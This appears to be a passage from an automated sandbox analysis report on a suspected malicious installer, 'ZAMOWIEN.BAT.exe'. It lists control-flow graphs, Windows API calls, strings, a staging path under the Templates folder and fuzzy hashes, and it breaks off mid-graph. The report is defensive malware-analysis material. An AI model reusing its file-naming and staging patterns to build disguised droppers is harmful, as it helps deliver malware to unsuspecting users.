                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                  • String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                                  • API String ID: 1975747703-3427577969
                                                                                  • Opcode ID: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
                                                                                  • Instruction ID: ac693f2390e271b0591ead3bca04d252cd9040af8bb9d400f005d771bc7483c2
                                                                                  • Opcode Fuzzy Hash: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
                                                                                  • Instruction Fuzzy Hash: 0D61B770244600BFE630AF269D46F273A6CEB44B45F40057EF985B62E2DB7D5911CA2D

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 369 402edd-402f2b GetTickCount GetModuleFileNameW call 405d7a 372 402f37-402f65 call 406284 call 405ba5 call 406284 GetFileSize 369->372 373 402f2d-402f32 369->373 381 403052-403060 call 402e79 372->381 382 402f6b 372->382 374 40310f-403113 373->374 389 403062-403065 381->389 390 4030b5-4030ba 381->390 383 402f70-402f87 382->383 385 402f89 383->385 386 402f8b-402f94 call 4032fb 383->386 385->386 395 402f9a-402fa1 386->395 396 4030bc-4030c4 call 402e79 386->396 391 403067-40307f call 403311 call 4032fb 389->391 392 403089-4030b3 GlobalAlloc call 403311 call 403116 389->392 390->374 391->390 415 403081-403087 391->415 392->390 420 4030c6-4030d7 392->420 399 402fa3-402fb7 call 405d35 395->399 400 40301d-403021 395->400 396->390 405 40302b-403031 399->405 418 402fb9-402fc0 399->418 404 403023-40302a call 402e79 400->404 400->405 404->405 411 403040-40304a 405->411 412 403033-40303d call 406751 405->412 411->383 419 403050 411->419 412->411 415->390 415->392 418->405 424 402fc2-402fc9 418->424 419->381 421 4030d9 420->421 422 4030df-4030e4 420->422 421->422 425 4030e5-4030eb 422->425 424->405 426 402fcb-402fd2 424->426 425->425 427 4030ed-403108 SetFilePointer call 405d35 425->427 426->405 428 402fd4-402fdb 426->428 431 40310d 427->431 428->405 430 402fdd-402ffd 428->430 430->390 432 403003-403007 430->432 431->374 433 403009-40300d 432->433 434 40300f-403017 432->434 433->419 433->434 434->405 435 403019-40301b 434->435 435->405
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                    • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                    • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                  • String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ZAMOWIEN.BAT.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                  • API String ID: 4283519449-670930626
                                                                                  • Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                  • Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
                                                                                  • Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                  • Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 436 4062a6-4062b1 437 4062b3-4062c2 436->437 438 4062c4-4062da 436->438 437->438 439 4062e0-4062ed 438->439 440 4064f2-4064f8 438->440 439->440 443 4062f3-4062fa 439->443 441 4064fe-406509 440->441 442 4062ff-40630c 440->442 444 406514-406515 441->444 445 40650b-40650f call 406284 441->445 442->441 446 406312-40631e 442->446 443->440 445->444 448 406324-406362 446->448 449 4064df 446->449 450 406482-406486 448->450 451 406368-406373 448->451 452 4064e1-4064eb 449->452 453 4064ed-4064f0 449->453 454 406488-40648e 450->454 455 4064b9-4064bd 450->455 456 406375-40637a 451->456 457 40638c 451->457 452->440 453->440 458 406490-40649c call 4061cb 454->458 459 40649e-4064aa call 406284 454->459 461 4064cc-4064dd lstrlenW 455->461 462 4064bf-4064c7 call 4062a6 455->462 456->457 463 40637c-40637f 456->463 460 406393-40639a 457->460 474 4064af-4064b5 458->474 459->474 465 40639c-40639e 460->465 466 40639f-4063a1 460->466 461->440 462->461 463->457 469 406381-406384 463->469 465->466 472 4063a3-4063ca call 406152 466->472 473 4063dc-4063df 466->473 469->457 470 406386-40638a 469->470 470->460 484 4063d0-4063d7 call 4062a6 472->484 485 40646a-40646d 472->485 477 4063e1-4063ed GetSystemDirectoryW 473->477 478 4063ef-4063f2 473->478 474->461 476 4064b7 474->476 480 40647a-406480 call 406518 476->480 481 406461-406465 477->481 482 4063f4-406402 GetWindowsDirectoryW 478->482 483 40645d-40645f 478->483 480->461 481->480 487 406467 481->487 482->483 483->481 486 406404-40640e 483->486 484->481 485->480 492 40646f-406475 lstrcatW 485->492 489 406410-406413 486->489 490 406428-40643e SHGetSpecialFolderLocation 486->490 487->485 489->490 494 406415-40641c 489->494 495 406440-406457 SHGetPathFromIDListW CoTaskMemFree 490->495 496 406459 490->496 492->480 498 406424-406426 494->498 495->481 495->496 496->483 498->481 498->490
                                                                                  APIs
                                                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E7
                                                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000), ref: 004063FA
                                                                                  • SHGetSpecialFolderLocation.SHELL32(00405323,00410EA0,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000), ref: 00406436
                                                                                  • SHGetPathFromIDListW.SHELL32(00410EA0,Call), ref: 00406444
                                                                                  • CoTaskMemFree.OLE32(00410EA0), ref: 0040644F
                                                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
                                                                                  • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000), ref: 004064CD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                  • API String ID: 717251189-848795675
                                                                                  • Opcode ID: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
                                                                                  • Instruction ID: 605843c2509a57f6f3c23207e2b9262681d5cb504286618bc70e882f3b2b38d7
                                                                                  • Opcode Fuzzy Hash: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
                                                                                  • Instruction Fuzzy Hash: 2C611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 563 40176f-401794 call 402c41 call 405bd0 568 401796-40179c call 406284 563->568 569 40179e-4017b0 call 406284 call 405b59 lstrcatW 563->569 574 4017b5-4017b6 call 406518 568->574 569->574 578 4017bb-4017bf 574->578 579 4017c1-4017cb call 4065c7 578->579 580 4017f2-4017f5 578->580 588 4017dd-4017ef 579->588 589 4017cd-4017db CompareFileTime 579->589 581 4017f7-4017f8 call 405d55 580->581 582 4017fd-401819 call 405d7a 580->582 581->582 590 40181b-40181e 582->590 591 40188d-4018b6 call 4052ec call 403116 582->591 588->580 589->588 592 401820-40185e call 406284 * 2 call 4062a6 call 406284 call 4058ea 590->592 593 40186f-401879 call 4052ec 590->593 603 4018b8-4018bc 591->603 604 4018be-4018ca SetFileTime 591->604 592->578 625 401864-401865 592->625 605 401882-401888 593->605 603->604 607 4018d0-4018db CloseHandle 603->607 604->607 608 402ace 605->608 610 4018e1-4018e4 607->610 611 402ac5-402ac8 607->611 612 402ad0-402ad4 608->612 614 4018e6-4018f7 call 4062a6 lstrcatW 610->614 615 4018f9-4018fc call 4062a6 610->615 611->608 622 401901-4022fc call 4058ea 614->622 615->622 622->612 625->605 627 401867-401868 625->627 627->593
                                                                                  APIs
                                                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,?,?,00000031), ref: 004017B0
                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,?,?,00000031), ref: 004017D5
                                                                                    • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                    • Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                                                    • Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll), ref: 00405359
                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp$C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$Call
                                                                                  • API String ID: 1941528284-4113197364
                                                                                  • Opcode ID: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
                                                                                  • Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
                                                                                  • Opcode Fuzzy Hash: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
                                                                                  • Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 629 4052ec-405301 630 405307-405318 629->630 631 4053b8-4053bc 629->631 632 405323-40532f lstrlenW 630->632 633 40531a-40531e call 4062a6 630->633 635 405331-405341 lstrlenW 632->635 636 40534c-405350 632->636 633->632 635->631 637 405343-405347 lstrcatW 635->637 638 405352-405359 SetWindowTextW 636->638 639 40535f-405363 636->639 637->636 638->639 640 405365-4053a7 SendMessageW * 3 639->640 641 4053a9-4053ab 639->641 640->641 641->631 642 4053ad-4053b0 641->642 642->631
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                  • lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                                                  • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll), ref: 00405359
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll
                                                                                  • API String ID: 2531174081-3173602412
                                                                                  • Opcode ID: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
                                                                                  • Instruction ID: 5cbdc996bc9841dedcc8c590482a37e7ed43af3164ff52369f5afd8429117419
                                                                                  • Opcode Fuzzy Hash: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
                                                                                  • Instruction Fuzzy Hash: FA219D71900618BBDB11AF96DD849CFBF78EF45354F50807AF904B62A0C3B94A50CFA8

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 643 40264a-402663 call 402c1f 646 402ac5-402ac8 643->646 647 402669-402670 643->647 650 402ace-402ad4 646->650 648 402672 647->648 649 402675-402678 647->649 648->649 651 4027dc-4027e4 649->651 652 40267e-40268d call 4061e4 649->652 651->646 652->651 656 402693 652->656 657 402699-40269d 656->657 658 402732-402735 657->658 659 4026a3-4026be ReadFile 657->659 660 402737-40273a 658->660 661 40274d-40275d call 405dfd 658->661 659->651 662 4026c4-4026c9 659->662 660->661 663 40273c-402747 call 405e5b 660->663 661->651 672 40275f 661->672 662->651 665 4026cf-4026dd 662->665 663->651 663->661 668 4026e3-4026f5 MultiByteToWideChar 665->668 669 402798-4027a4 call 4061cb 665->669 668->672 673 4026f7-4026fa 668->673 669->650 675 402762-402765 672->675 676 4026fc-402707 673->676 675->669 677 402767-40276c 675->677 676->675 678 402709-40272e SetFilePointer MultiByteToWideChar 676->678 679 4027a9-4027ad 677->679 680 40276e-402773 677->680 678->676 681 402730 678->681 682 4027ca-4027d6 SetFilePointer 679->682 683 4027af-4027b3 679->683 680->679 684 402775-402788 680->684 681->672 682->651 685 4027b5-4027b9 683->685 686 4027bb-4027c8 683->686 684->651 687 40278a-402790 684->687 685->682 685->686 686->651 687->657 688 402796 687->688 688->651
                                                                                  APIs
                                                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                                  • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                                    • Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405E71
                                                                                  • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                  • String ID: 9
                                                                                  • API String ID: 163830602-2366072709
                                                                                  • Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                                  • Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
                                                                                  • Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                                  • Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 689 4065ee-40660e GetSystemDirectoryW 690 406610 689->690 691 406612-406614 689->691 690->691 692 406625-406627 691->692 693 406616-40661f 691->693 695 406628-40665b wsprintfW LoadLibraryExW 692->695 693->692 694 406621-406623 693->694 694->695
                                                                                  APIs
                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                                  • wsprintfW.USER32 ref: 00406640
                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                                  • API String ID: 2200240437-1946221925
                                                                                  • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                  • Instruction ID: 0a3accc906e0554885a7c349f3439cc1632e9825758041c21a8046ddc9b1cf8d
                                                                                  • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                  • Instruction Fuzzy Hash: 28F0217050111967CB10EB64DD0DFAB3B6CA700304F10487AA547F10D1EBBDDB64CB98

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 696 403116-40312d 697 403136-40313e 696->697 698 40312f 696->698 699 403140 697->699 700 403145-40314a 697->700 698->697 699->700 701 40315a-403167 call 4032fb 700->701 702 40314c-403155 call 403311 700->702 706 4032b2 701->706 707 40316d-403171 701->707 702->701 710 4032b4-4032b5 706->710 708 403177-403197 GetTickCount call 4067bf 707->708 709 40329b-40329d 707->709 720 4032f1 708->720 722 40319d-4031a5 708->722 711 4032e6-4032ea 709->711 712 40329f-4032a2 709->712 714 4032f4-4032f8 710->714 715 4032b7-4032bd 711->715 716 4032ec 711->716 717 4032a4 712->717 718 4032a7-4032b0 call 4032fb 712->718 723 4032c2-4032d0 call 4032fb 715->723 724 4032bf 715->724 716->720 717->718 718->706 729 4032ee 718->729 720->714 726 4031a7 722->726 727 4031aa-4031b8 call 4032fb 722->727 723->706 733 4032d2-4032de call 405e2c 723->733 724->723 726->727 727->706 734 4031be-4031c7 727->734 729->720 738 4032e0-4032e3 733->738 739 403297-403299 733->739 736 4031cd-4031ea call 4067df 734->736 742 4031f0-403207 GetTickCount 736->742 743 403293-403295 736->743 738->711 739->710 744 403252-403254 742->744 745 403209-403211 742->745 743->710 746 403256-40325a 744->746 747 403287-40328b 744->747 748 403213-403217 745->748 749 403219-40324a MulDiv wsprintfW call 4052ec 745->749 751 40325c-403261 call 405e2c 746->751 752 40326f-403275 746->752 747->722 753 403291 747->753 748->744 748->749 754 40324f 749->754 757 403266-403268 751->757 756 40327b-40327f 752->756 753->720 754->744 756->736 758 403285 756->758 